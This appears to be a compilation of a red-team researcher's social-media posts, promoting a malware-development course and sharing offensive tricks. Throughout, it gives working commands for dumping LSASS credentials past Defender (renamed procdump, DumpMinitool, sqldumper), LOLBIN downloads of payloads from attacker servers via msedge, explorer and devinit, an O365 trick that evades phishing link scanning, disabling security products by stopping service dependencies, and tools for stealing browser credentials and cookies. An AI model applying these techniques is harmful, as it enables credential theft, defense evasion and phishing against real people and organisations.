MalDev Academy is ready!
Website: MaldevAcademy[.]com
Launch date: April 16th, 2023
- 32 Beginner modules
- 49 Intermediate modules
- 10 Advanced modules
- 20 in the works for updates in the next few months
- 65 Custom code samples
Very fair pricing, starting at 249$
@NUL0x4C
I published a blog article detailing a phishing technique I called Browser in the Browser (BITB) Attack. It's very simple but can be very effective. I also published templates on my Github feel free to test them out.
If you rename procdump.exe to dump64.exe and place it in the "C:\Program Files (x86)\Microsoft Visual Studio\*" folder, you can bypass Defender and dump LSASS.
Here I bypassed Defender AV by making:
.eyb files as .exe
.faq files as .dll
I'm sure this can work on other security solutions and for many other blacklisted techniques. (1/2)
LOLBIN to dump LSASS:
Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions
Binary: DumpMinitool.exe
The params are case sensitive.
Another way to download files using msedge/chrome:
[msedge.exe | chrome.exe] --headless --enable-logging --disable-gpu --dump-dom "
http://server/evil.b64.html"
> out.b64
- Downloaded file should end with .html.
- Binaries should be encoded.
Today I've launched . I've been analyzing malware source code that utilizes WinAPIs and have been categorizing them. Please feel free to contribute as I know the current list is not exhaustive.
Living Off Trusted Sites:
Attackers are using popular legitimate domains to conduct attacks (e.g. phishing). I've attempted to compile a list of legitimate domains that can be abused by attackers. As usual, feel free to contribute.
If you compose an email using the "Reply" function on O365 which has a link, intercept the request and add an extra empty href attribute then O365 won't scan the link anymore.
<a href="phishing link">click</a> ==> junk
<a href="" href="phishing link">click</a> ==> inbox
For the past couple of months
@NUL0x4C
and I have been working on a module-based malware dev training course that covers various techniques in-depth. Its emphasis is on simplifying complex concepts & evasion. Every module contains highly commented custom code. Stay tuned!
Inserted attachments on OneNote can be directly downloaded. The domain used is onenoteonlinesync[.]onenote[.]com
1. Insert a file attachment on a OneNote Notebook
2. Double click the inserted attachment and grab the direct download link.
Added to
EvilSelenium - This project weaponizes Selenium to attack Chrome. Dump saved credentials, cookies, take (authenticated) screenshots, dump emails from gmail/o365 or chats from Whatsapp and exfiltrate & download files. ENJOY.
Twitter is great for sharing infosec related stuff, but it's also too dynamic and people may miss stuff. So every few months I'll link any interesting tweets I had made. Enjoy.
msedge kiosk mode + a fake Windows login page. Don't know if it's practical, but interesting for sure.
msedge.exe --app="
http://example[.]com/index.html"
--kiosk
Outlook attachments can be directly downloaded.
1. Compose an email
2. Attach a file (add .txt to the end if it's a restricted file type)
3. Click on the file to download it and grab the link (attachment[.]outlook[.]live[.]net)
Link is valid for ~15 minutes.
explorer.exe can launch a browser and download a file. Append a harmless extension to the file then remove it after download.
Default browser:
explorer.exe
https://server/file.exe.txt
Edge:
explorer.exe microsoft-edge:
https://server/file.exe.txt
WebView2 desktop applications have functionality that allows for JS to be injected into any website & for cookies to be stolen.
In my new blog post I explore how it can be used by attackers and I provide working code. Enjoy!
Didn't have time to talk about the newly released TLDs last week, but here we go.
File Archiver In The Browser: Emulating file archive software in the browser with a .zip domain for phishing
Procdump dump lsass
Defender: Threat detected!
Sqldumper dump lsass
Defender: Sure, go right ahead!
btw dumping lsass with sqldumper.exe is not new, actually its quite old.
devinit.exe - Great MS signed tool with tons of useful commands but needs VS to run properly.
I tested msi-install, it downloads a msi file to C:\Windows\Installer\ then installs it.
devinit.exe run -t msi-install -i
http://10.0.0.18/out.msi
LOLBIN: Microsoft.NodejsTools.PressAnyKey.exe
Execute a local binary or one from a file share.
Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools
Procdump works against Defender with a simple rename. It quarantines the generated .dmp file but you have a few seconds to make a copy of it before it's removed.
I've seen other security solutions that do this, try to copy the file quickly before it's removed.
I've create a simple Python script that converts executables generated with pe_to_shellcode to a format that works with cdb.exe. Useful for evasion & application whitelisting bypass.
How much awareness is there around Context Menu Spoofing/Hijacking for persistence?
Here's hijacking SentinelOne's "Scan for threats" to run a command.
Start Edge minimized, download file, delay a few seconds to allow download to complete and kill Edge.
start /min msedge.exe
https://server/file.exe.zip
&& timeout 3 && taskkill /IM "msedge.exe" /F
Modify file extension back to original after download.
I mentioned a few days ago that there's two LOLBIN binaries that do DLL injection.
After re-checking the digital signature I don't believe they're considered LOLBINs (correct me if I'm wrong) but since they're interesting I'll share them anyway. (1/2)
"Although the code and the technique was copied from the mrd0x original blogpost dating back to 2022, the analysed document is currently only detected by one antivirus engine on VirusTotal (eScan) at the time of writing." 🤔
I'll be dropping two variations of a new initial access technique exclusively for
@MalDevAcademy
premium & lifetime users (in update 2 or update 3).
Red teamers you'll be very happy.
Blue teamers you'll want to have safeguards in place for this.
I actually didn't know the about the Windows Device Portal feature. Kernel & process dumps, process and network information, application management all with optional authentication? I'll take it.
All security solution vulns I previously found were too easily exploitable.
In the newly posted Exploiting EDRs For Evasion module in
@MalDevAcademy
I demonstrated how changing a non-protected registry key prevents logs from arriving to the EDR console. Too easy.
Before we wrap up the year, it’s time to get out one last Kali release for 2023.
Announcing Kali 2023.4! for a focus on the addition of Hyper-V support to Vagrant, ARM64 Cloud images, support for the Pi 5, and an update to Gnome 45. Check it out!
20 new websites added to
An interesting site added is feedproxy[.]google[.]com. I was not aware that it's being used in phishing attacks. Creds:
@BushidoToken
Since any file extension can be modified to become executable, wouldn't something like this mess with rules that look for "cmd.exe" spawning "powershell.exe" for example?
Please make sure you're aware that this technique is not necessarily VNC specific. Of course it can work with any web-based remote access method (e.g. web-based RDP, TeamViewer etc).
But I felt noVNC provided the most seamless experience to target users.
Since MS Teams now allows external users to message users within an organization, the Teams Abuse article may be worth a revisit.
I also updated it to add a few more techniques.
I disabled multiple security solutions using a simple method which involves stopping/modifying the dependencies of the service.
1. sc qc <service> ==> check dependencies
2. sc qc <dependency> ==> stop it or attempt to modify it through the registry.
I added macros as a category on . Credits to
@Hexacorn
for making me realize how many file extensions there are related to macros.
I also removed a few other categories that I don't think are as useful as I initially thought they'd be. Enjoy!
@Warlockobama
That's the first thing that comes to mind for sure. But now users will have 3 thoughts when they notice this:
1.Suspicious
2.Technical glitch
3.Intended "feature"
Maybe if we're lucky our odds may just be the latter two.
I think this is a great example of how important it is to be conscious of what you put out there. The smallest things can potentially be used in ways you didn't expect.
@mrd0x
Example that works:
./DumpMinitool.exe 1 'dump6.txt' 2 660 3 Full
Dump minitool: Started with arguments 1 dump6.txt 2 660 3 Full
Output file: 'dump6.txt'
Process id: 660
Dump type: Full
Dumped process.
Can confirm this works. Another way is to send an email saying "There's IT work going on you may receive a 2FA prompt, just accept it." Surprisingly it works.
@techspence
I only tested it with downloading and copying from a remote share. Using SMB is shown in the attached image.
Also note that it's still subject to other methods of detection like behavior, heuristics etc.
Can confirm this works. Another way is to send an email saying "There's IT work going on you may receive a 2FA prompt, just accept it." Surprisingly it works.
@NinjaParanoid
I feel like it’s a small part of the community but they’re just very loud and always seem to be morally and intellectually superior than everyone else
@mythicalcmd
@NUL0x4C
This training is far more in-depth. Also its text-based not video-based. There's custom code (all commented) and exclusive tools shared on there. Here's an example of one module that covers a custom tool 'HellShell'.
Microsoft took measures to ensure the link breaks if this is done when an email is composed normally. But when sent using the 'Reply' or 'Reply All' functionality that protection mechanism doesn't kick in.
Added:
Although this can also be used for phishing, its severely restricted due to the time limit & file type restrictions. I can still add it as a phishing technique if people think its worth adding. Any comments are welcome.